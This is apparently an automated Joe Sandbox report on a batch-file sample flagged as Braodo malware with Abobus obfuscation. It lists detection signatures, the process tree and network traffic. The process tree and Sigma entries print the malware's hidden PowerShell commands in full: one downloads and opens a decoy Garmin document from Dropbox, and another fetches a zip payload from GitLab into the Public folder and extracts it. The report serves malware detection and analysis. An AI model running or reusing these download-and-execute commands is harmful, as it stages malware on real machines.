Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jhsdgfjkh236.bat

Overview

General Information

Sample name:jhsdgfjkh236.bat
Analysis ID:1578274
MD5:24679294caaa93cba79e8a89fe3b9ad5
SHA1:cd76ad906bdb6df31acefa942a30a2cffabda9f1
SHA256:e5138ceb9edb0277779b64cfea8fc531c4dd7641199acb151d031fb0c8ae0d12
Tags:batBraodouser-JAMESWT_MHT
Infos:

Detection

Abobus Obfuscator, Braodo
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 8140 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\jhsdgfjkh236.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 7224 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)
    • cmd.exe (PID: 7316 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • find.exe (PID: 7360 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • findstr.exe (PID: 7396 cmdline: findstr /L /I set "C:\Users\user\Desktop\jhsdgfjkh236.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 7468 cmdline: findstr /L /I goto "C:\Users\user\Desktop\jhsdgfjkh236.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 7524 cmdline: findstr /L /I echo "C:\Users\user\Desktop\jhsdgfjkh236.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 6944 cmdline: findstr /L /I pause "C:\Users\user\Desktop\jhsdgfjkh236.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • find.exe (PID: 7588 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 7576 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 7732 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 6604 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 7056 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgh8090051/jgh/-/raw/main/FGa1812.zip', 'C:\Users\Public\Document.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 2220 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
jhsdgfjkh236.batJoeSecurity_AbobusObfuscatorYara detected Abobus ObfuscatorJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 7732JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 7056JoeSecurity_Braodo_1Yara detected BraodoJoe Security
        Process Memory Space: powershell.exe PID: 7056JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          SourceRuleDescriptionAuthorStrings
          amsi64_7732.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi64_7056.amsi.csvJoeSecurity_Braodo_1Yara detected BraodoJoe Security
              amsi64_7056.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\jhsdgfjkh236.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8140, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", ProcessId: 7732, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\jhsdgfjkh236.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8140, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", ProcessId: 7732, ProcessName: powershell.exe
                Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7056, TargetFilename: C:\Users\Public\Document.zip
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\jhsdgfjkh236.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8140, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", ProcessId: 7732, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\jhsdgfjkh236.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8140, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", ProcessId: 7732, ProcessName: powershell.exe
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\jhsdgfjkh236.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8140, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", ProcessId: 7732, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\jhsdgfjkh236.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8140, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V11.docx')", ProcessId: 7732, ProcessName: powershell.exe
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
                Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.10:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.10:49729 version: TLS 1.2
                Source: Binary string: n.pdbcY source: powershell.exe, 0000000C.00000002.1369267843.000001973A988000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnet0ui@ source: powershell.exe, 0000000C.00000002.1369267843.000001973A988000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1367991489.000001973A613000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: *.pdbp source: powershell.exe, 0000000C.00000002.1367991489.000001973A613000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1367991489.000001973A5F7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbn source: powershell.exe, 0000000C.00000002.1367991489.000001973A613000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbRb source: powershell.exe, 0000000C.00000002.1369267843.000001973A988000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\catroot2Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\AppxSip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\OpcServices.DLLJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\wshext.dllJump to behavior
                Source: global trafficHTTP traffic detected: GET /scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /fgh8090051/jgh/-/raw/main/FGa1812.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
                Source: Joe Sandbox ViewIP Address: 162.125.69.18 162.125.69.18
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /fgh8090051/jgh/-/raw/main/FGa1812.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; frame-ancestors 'self' https://*.dropbox.com ; img-src https://* data: blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: child-src https://www.dropbox.com/static/serviceworker/ blob: ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; frame-ancestors 'self' https://*.dropbox.com ; img-src https://* data: blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 0000000C.00000002.1350168828.0000019723A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: m/static/serviceworker/ blob: ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; frame-ancestors 'self' https://*.dropbox.com ; img-src https://* data: blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: 